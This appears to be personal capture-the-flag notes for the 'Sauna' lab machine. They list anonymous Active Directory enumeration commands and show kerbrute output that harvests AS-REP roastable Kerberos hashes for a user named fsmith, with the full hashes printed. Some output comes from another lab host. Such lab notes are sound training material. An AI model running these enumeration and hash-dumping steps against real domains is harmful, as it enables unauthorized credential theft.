Skip to main content

Sauna

Start

Scanning by nmap


Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-11-24T03:14:39
 work   0 VPN  1 code  2 vscode  3 newZSH  4 bloodhound  5 zsh  6 code  7 win7  8 zsh  9 zsh-  10 code* 

Enumerate

lika@learning:~/Downloads/CVE-2024-8353$ netexec smb $IP
[*] Adding missing option 'check_guest_account' in config section 'nxc' to nxc.conf
[*] Adding missing section 'BloodHound-CE' to nxc.conf
[*] Adding missing option 'bhce_enabled' in config section 'BloodHound-CE' to nxc.conf
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)

netexec smb $target -u '' -p '' --users netexec smb $target -u '' -p '' --rid-brute netexec smb $target -u 'guest' -p '' --rid-brute netexec ldap $target -u 'guest' -p '' --users netexec ldap $target -u 'guest' -p '' --rid-brute netexec ldap $target -u '' -p '' --users

rpcclient -U "" -N <ip>


Sau khi kết nối, chạy các lệnh:

serverinfo lsaenumsid netshareenumall enumdomusers querydispinfo enumdomgroups enumdomains

certipy-ad find -u '' -p '' -dc-ip $target -vulnerable

cnmap -n -sV --script "ldap* and not burte" -p 389 $target

enum4linux -a $target

Get list user

kerbrute userenum user2.txt --dc $target -d EGOTISTICAL-BANK.LOCAL

Dùng generated users python để tạo list user

lika@learning:~/Downloads/AD-Username-Generator$ kerbrute userenum generated.txt --dc $target -d EGOTISTICAL-BANK.LOCAL

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 11/28/25 - Ronnie Flathers @ropnop

2025/11/28 23:08:45 >  Using KDC(s):
2025/11/28 23:08:45 >   10.10.10.175:88

2025/11/28 23:08:45 >  [+] VALID USERNAME:       hsmith@EGOTISTICAL-BANK.LOCAL
2025/11/28 23:08:45 >  [+] VALID USERNAME:       HSmith@EGOTISTICAL-BANK.LOCAL
2025/11/28 23:08:45 >  Done! Tested 11 usernames (2 valid) in 0.083 seconds
[-] invalid principal syntax
lika@learning:~/Downloads/AD-Username-Generator$ kerbrute userenum ../AD-Username-Generator/generated.txt --dc $target -d EGOTISTICAL-BANK.LOCAL

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 11/29/25 - Ronnie Flathers @ropnop

2025/11/29 00:02:46 >  Using KDC(s):
2025/11/29 00:02:46 >   10.10.10.175:88

2025/11/29 00:02:46 >  [+] VALID USERNAME:       hsmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 >  [+] VALID USERNAME:       HSmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 >  [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:8054f8c97193b6ba2032a072d52d9787$ac874de6e5bab0a18c6861fe4f81f97001bd0740f5beeb1849737aff552722ce93ad062f85f84d92f0110452dc661f747cc38
e618b39c55833363fdd0cbd083260f09543cbfef4a72233ffec87a1ed648bbb8a5785a3b38b6543d72bf66b3c1f41cf18c5b48495fb97a090094688d062165b97a48850e3a9372b72c6b83048f662d38fe6cfe2c75c9a17380
808a44c774deadc38bd2ea6d4debef4d7b4c6c3e200bcc1c582920dbeb8c129703b392159491913203ac083bbe3235d2a7194b39aee4bae3ba9fb46a75eee90bc2a98c7f2438eba76fdc6fd01e35f5b6ab74067224f6f805a7
c32e12aaaa24e1d1099238c6ea31c64b8fbdf4995016959c55b99fd192f08c6542c23da28b0588b1cd8611eae28c33d6139
2025/11/29 00:02:46 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL
2025/11/29 00:02:46 >  [+] FSmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$FSmith@EGOTISTICAL-BANK.LOCAL:144e59fa6ac6b5690c13fd2619190351$fea51169706294af72120efb3423d19446a21db6a264699a0905102af9f6bb7cc95a4aa81689fcb29a543e771b1a1b087bcec
dca22fd7d61e71112a2ffa52925a0b2a1ba8e4e010519dfb2f0e3d3d0d513b710ba6bd13b9e4563d6cf7c7c8d5d58f6cbcaa92083ebaacddf68e1cad50550f74a5b5cec7403a44fb8a9d5786314961dcbd5e0d6aea7e40d385
17117dfe3d6f5b681260d299a221cc8566d1d0a8061bab2d599e3883fd7744f6becf05f23d6b9cd3927cdeeb11b3991fa10b75df1503f41af43516382ebbd7d7428a63f698e991c542980c39cae61ef7a88e3126f91e4e25bc
1f4dda5f88fb31f3b6cec3f12d87d3abb97733ce2e2541ed3390faffde6791d0813b39fc6eadaab31b47267ac1a228db608
2025/11/29 00:02:46 >  [+] VALID USERNAME:       FSmith@EGOTISTICAL-BANK.LOCAL

Another command

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:d7377bb6726e2c6e62eefcab21805c17$33fd6d1933edb3153eedf6ae969283894c1e1d9b742cb8a3f870982d12eb3e5919404b0d3b1b40961181f8875f0d195430420faf892d3c73d8586b7058dba39e93f7f64339f98c68f1a2851c9e3116afd599765695686320342f9ce4b1dada91e818985a67af58a3067bf0d13183a84106343e7042b23c80861382da5a01d79902ded5b43f1eeabfae70ebbe28221f83371c527b2a1149ec49e3ce9c22721c75c896aa94046cda9249e76941ac60b50825e6be54ec001b4228b45292a775c433b7e1bda300c6aea16c59dfa04feabbe5ced695c4cb1e13276f3245eea1d5df1283fbb86754765f4f94c4da10940ac5fb3e546e9286b3492307eb8db5481800e8
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:a1ba22c7add41f1d32aeb3dbb45c4148$b6742af3cbfa84768214046bec0251395a7dea91312c4234a58e33c16c2ead9d8c97618809fd149526cffa2aee3adb9084a37eaf5af4eb181d38a10f0a9f8edc463b8ea45b6ae528024a26ac248439130bbef0bb9bb619f5e03676e8d841e7be04bfb2e336e9cf0c68ecd67253a77c7e2927e7d62e3c83659df6998b22217eb1bdc9f8f3ede614d3c8e7a0c4fcb4367fbce57b905ddbc57c0bcd87aa25d2edcb35afdd1731462a96236213c9f007159d12451936b84cef4e74d58e8c279e0562dd4942c8ae614c52b71412ffde1807a038878dbf21b2e1010eedfa3e28e60e80a6c2410dd929e3cf3492a2c13879ff6fb18460b9915d0a4cd5583adf3963c1fa